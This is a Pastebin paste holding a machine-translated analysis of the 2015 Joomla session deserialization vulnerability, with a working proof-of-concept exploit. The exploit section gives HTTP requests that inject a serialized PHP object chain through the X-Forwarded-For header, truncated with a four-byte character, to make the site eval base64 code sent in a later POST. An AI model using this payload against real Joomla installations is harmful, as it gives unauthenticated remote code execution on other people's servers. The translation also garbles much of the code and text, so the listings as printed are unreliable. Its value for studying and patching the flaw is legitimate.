API tools faq
paste
Advertisement
Guest User

joomla poc translation

a guest
Dec 15th, 2015
1,368
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.77 KB | None | 0 0
raw download clone embed print report
  1. Joomla Emergency Security Team released 3.4.6 version fixes a high-risk 0day vulnerabilities .
  2.  
  3. Affects Version
  4.  
  5. from Joomla 1.5 up until 3.4.5
  6.  
  7. This vulnerability without logging, the front desk to code execution
  8.  
  9. A, session deserialization
  10.  
  11. php function session_set_save_handler ()
  12. The official manual describes as follows:
  13. Parameter read ()
  14. read (string $ sessionId)
  15. If the session has data, the callback function must return a string read session data coding (serialization) after. If the session is no data, read callback function returns an empty string.
  16.  
  17. After the session is started automatically or by calling session_start () function to manually start the session, PHP internally calls read callback function to obtain session data. Before calling read, PHP will call open the callback function.
  18. string format read callback returned after serialization must be fully consistent with the format write callback function to save data. PHP strings will automatically deserialized returned and populates $ _SESSION superglobal. Although the data looks and serialize () function is similar, but need to be reminded that they are different.
  19.  
  20. In short, by session_set_save_handler rewrite read method, the return value after deserialization fill $ _SESSION ()
  21. Examples are as follows:
  22.  
  23. <? Php
  24. classFileSessionHandler
  25. {
  26. private $ savePath;
  27. function open ($ savePath, $ sessionName)
  28. {
  29. $ This-> savePath = $ savePath;
  30. if (! is_dir ($ this-> savePath)) {
  31. mkdir ($ this-> savePath, 0777);
  32. }
  33. return true;
  34. }
  35. function close ()
  36. {
  37. return true;
  38. }
  39. function read ($ id)
  40. {
  41.  
  42. $ Data = @ file_get_contents ("$ this-> savePath / sess_ $ id");
  43. var_dump ($ data);
  44. return (string)file_get_contents ("$ this-> savePath / sess_ $ id");
  45. }
  46. function write ($ id, $ data)
  47. {
  48. ? // Return file_put_contents ("$ this-> savePath / sess_ $ id", $ data) === false false: true;
  49. }
  50. function destroy ($ id)
  51. {
  52. $ File = "$ this-> savePath / sess_ $ id";
  53. if (file_exists ($ file)) {
  54. unlink ($ file);
  55. }
  56. return true;
  57. }
  58. function gc ($ maxlifetime)
  59. {
  60. foreach (glob ("$ this-> savePath / sess_ *") as $ file) {
  61. if (filemtime ($ file) + $ maxlifetime <time () && file_exists ($ file)) {
  62. unlink ($ file);
  63. }
  64. }
  65. return true;
  66. }
  67. }
  68. $ Handler = new FileSessionHandler ();
  69. session_set_save_handler (
  70. array ($ handler, 'open'),
  71. array ($ handler, 'close'),
  72. array ($ handler, 'read'),
  73. array ($ handler, 'write'),
  74. array ($ handler, 'destroy'),
  75. array ($ handler, 'gc')
  76. );
  77. session_start ();
  78. var_dump ($ _ SESSION);
  79. Run Results
  80.  
  81. 1.png
  82.  
  83. As can be seen, the two vardump out the results, respectively, before and after serialization serialization
  84.  
  85. Second, the database truncation
  86.  
  87. Introduction "The character set named utf8 uses a maximum of three bytes per character and contains only BMP characters." Through the official website, mysql utf8 when in use, the upper limit of a character size of 3 bytes, and when there is four bytes When a character is needed to use utf8mb4 coding, do not use it, would not recognize the four-byte character string together back together discarded.
  88. For details, see: http://xteam.baidu.com/?p=177
  89.  
  90. Third, the vulnerability analysis
  91.  
  92. joomla will be user-agent and x-forwarded-for content to write session, outside controlled and did not carry out any filtering
  93.  
  94. // Record proxy forwarded for in the session in case we need it later
  95. if (isset ($ _ SERVER ['HTTP_X_FORWARDED_FOR']))
  96. {
  97. $ This-> set ('session.client.forwarded', $ _SERVER ['HTTP_X_FORWARDED_FOR']);
  98. }
  99. // Check for clients browser
  100. if (in_array ('fix_browser', $ this -> _ security) && isset ($ _ SERVER ['HTTP_USER_AGENT']))
  101. {
  102. $ Browser = $ this-> get ('session.client.browser');
  103. if ($ browser === null)
  104. {
  105. $ This-> set ('session.client.browser', $ _SERVER ['HTTP_USER_AGENT']);
  106. }
  107. elseif ($ _SERVER ['HTTP_USER_AGENT']! == $ browser)
  108. {
  109. //todo Remove code: $ this -> _ state = 'error';
  110. //todo Remove code: return false;
  111. }
  112. }
  113. return true;
  114. }
  115. When writing to the database after the session, using the previously spoken truncated four-byte characters, so we write session can be successfully deserialized
  116.  
  117. The following is the contents after write
  118.  
  119. __default | a: 9: {s: 15: "session.counter"; i: 1; s: 19: "session.timer.start"; i: 1450172177; s: 18: "session.timer.last"; i : 1450172177; s: 17: "session.timer.now"; i: 1450172177; s: 24: "session.client.forwarded"; s: 435: "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: { s: 2: "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 60: "eval (base64_decode ($ _ POST [111]) ); JFactory :: getConfig (); exit; "; s: 19:" cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O : 20: "JDatabaseDriverMysql": 0: {}} i: 1; s: 4: "init";}} s: 13: "connection"; b: 1;}
  120. And the back is automatic deserialization session
  121.  
  122. public function register ()
  123. {
  124. // Use this object as the session handler
  125. session_set_save_handler (
  126. array ($ this, 'open'), array ($ this, 'close'), array ($ this, 'read'), array ($ this, 'write'),
  127. array ($ this, 'destroy'), array ($ this, 'gc')
  128. );
  129. }
  130. Use the session_set_save_handler function rewrite the read () method
  131. read () method is as follows
  132.  
  133. public function read ($ id)
  134. {
  135. // Get the database connection object and verify its connected.
  136. $ Db = JFactory :: getDbo ();
  137. try
  138. {
  139. // Get the session data from the database table.
  140. $ Query = $ db-> getQuery (true)
  141. -> Select ($ db-> quoteName ('data'))
  142. -> From ($ db-> quoteName ('#__ session'))
  143. -> Where (. $ Db-> quoteName ('session_id') '=' $ db-> quote ($ id).);
  144. $ Db-> setQuery ($ query);
  145. $ Result = (string) $ db-> loadResult ();
  146. $ Result = str_replace ('', chr (0). '*' Chr (0), $ result.);
  147. return $ result;
  148. }
  149. catch (Exception $ e)
  150. {
  151. return false;
  152. }
  153. }
  154. read () automatically after a deserialization operations return, resulting in objects php injection
  155.  
  156. Fourth, exploit
  157.  
  158. User-aget and X-FORWARDER-FOR can modify session
  159.  
  160. GET / joomla / HTTP / 1.1
  161. Host: 192.168.152.130
  162. User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 30.0) Gecko / 20100101 Firefox / 30.0
  163. x-forwarded-for:} __ test | O: 21: "JDatabaseDriverMysqli": 3: {s: 2: "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8 : "feed_url"; s: 60: "eval (base64_decode ($ _ POST [111])); JFactory :: getConfig (); exit;"; s: 19: "cache_name_function"; s: 6: "assert"; s : 5: "cache"; b: 1; s: 11: "cache_class"; O: 20: "JDatabaseDriverMysql": 0: {}} i: 1; s: 4: "init";}} s: 13: "connection"; b: 1;} ð Œ †
  164. Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
  165. Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3
  166. Accept-Encoding: gzip, deflate
  167. Cookie: 82864b7eae85ebcf7a6fbdda5d464249 = h5kl99v8ddi9t64919sf706q64
  168. Connection: keep-alive
  169. Execute code
  170.  
  171. POST / joomla / HTTP / 1.1
  172. Host: 192.168.152.130
  173. User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 30.0) Gecko / 20100101 Firefox / 30.0
  174. Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
  175. Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3
  176. Accept-Encoding: gzip, deflate
  177. Cookie: 82864b7eae85ebcf7a6fbdda5d464249 = h5kl99v8ddi9t64919sf706q64
  178. Connection: keep-alive
  179. Content-Type: application / x-www-form-urlencoded
  180. Content-Length: 24
  181. 111 = cGhwaW5mbygpOw% 3d% 3d
  182. Taken to ensure consistency of data in the cookie can be
  183.  
  184. 2.jpg
  185.  
  186. Related Links
  187.  
  188. [1] https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
  189. [2] http://php.net/session_set_save_handler
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!